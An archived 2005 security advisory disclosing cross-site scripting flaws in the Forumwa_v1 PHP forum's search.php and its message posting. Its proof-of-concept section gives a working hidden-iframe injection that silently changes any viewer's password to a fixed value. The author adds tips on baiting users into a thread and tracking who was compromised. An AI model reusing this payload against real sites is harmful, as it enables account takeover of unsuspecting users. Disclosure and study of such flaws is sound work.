OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Forumwa search.php xss vulnerability

From: Raven (raventgs-security.com)
Date: Mon Feb 28 2005 - 18:35:21 CST


 [][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]
 []
 [] HRG - Hackerlounge Research Group
 [] Release: HRG005
 [] Monday 03/01/05
 [] Forumwa_v1
 []
 [] The author can't be held responsible for any
damage
 [] done by a reader. You have your own resonsibility
 [] Please use this document like it's meant to.
 []
 [][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]
  
 Vulnerable: Forumwa_v1 (any version)
  
 
 ---
  
 General information:
  
 Forumwa is a simple discussion forum, based on PHP
and MYSQL. Beside the basic-features there are
special functions like search function, user
profiles, memberlist, mailer, feedback?
Multilanguage, easy installation.
  
  
 ---
  
 Description:
  
 The search.php script is vulnerable to a XSS attack
by a remote attacker. The searched string is not
filtered for any harmfull characters like < > and ".
This makes it possible for an attacker to trick a
user into going to a harmfull page and stealing a
session.
  
 Also, the body and the subject of a message posted
on the forum are not checked for < or > characters.
The combination of these two vulnerabilitys makes a
real big problem.
  
  
 ---
  
 Proof Of Concept:
  
 What this proof of concept will do is load a 1x1px
IFrame from a message in the board that will abuse
the search.php xss attack to change a viewers
password to "wh00ters". How to use: make a post
containing the following body and hope someone
actually views the messages on the board. Once they
open the link to view the post, their account is
yours. Tip, make it a nice thread that people will
reply to so you know who you compromised.
  
 ---PoC Injection---
  
 <iframe SRC=http://[HOST URL CHANGEME!!!]/[FORUM
DIRECTORY
CHANGEME!!!]/search.php?keyword=%3C/title%3E%3Ciframe%20SRC=http://[HOST
URL CHANGEME!!!]/[FORUM DIRECTORY
CHANGEME!!!]/account.php?passwdu=wh00ters%26passwda=wh00ters%26emailu=umail.com%26changelog=change%20WIDTH=0%20HEIGHT=0%3E%3C/iframe%3E%3Ctitle%3E
HEIGHT=1 WIDTH=1></iframe>
  
 ---PoC Injection---
  
 All that needs to be altered in this injection are
the things between [ ] that says "CHANGEME!!!"
  
  
 ---
  
 Fix and Vendor status:
  
Vendor has been notified; expect an official patch
soon.
  
 ---
 
Greetz:
 
All the people at hackerlounge.com, JWT,
TGS-Security.com and JWT-Security.net.
Specifically:
 
Th3_Rv3n (me), Dlab, Riddick, Enjoi, Blademaster,
Modzilla, Pingu, Jake Johnson, Afterburn, airo,
cardiaC, chis, ComputerGeek, deep_phreeze, dudley,
evasion, eXtacy, Mattewan, Afterburn,
Thanatos_Starfire, Roz, Sirross, UmInAsHoE, Infinite,
Slarty, NoUse, Snake (I hate you), Surreal (I hate
you), -=Vanguard=-, The_IRS, puNKiey, driedice,
Carnuss, oKiDaN, Mr.Mind, dementis, net-RIDER,
voteforpedro, Cryptic_Override, kodaxx,
~CreEpy~NoDquE~, Brainscan, the_exode,
phillysteak12345, DerrtyJake, =>HeX<=, m0rk, and
anyone else I forgot.
 
 
---
 
Credit:
 
HRG - Hackerlounge Research Group
http://www.Hackerlounge.com
 
  
 [][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]
 []
 [] HRG - Hackerlounge Research Group
 [] Release: HRG005
 [] Monday 03/01/05
 [] Forumwa_v1
 []
 [] The author can't be held responsible for any
damage
 [] done by a reader. You have your own resonsibility
 [] Please use this document like it's meant to.
 []
 [][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]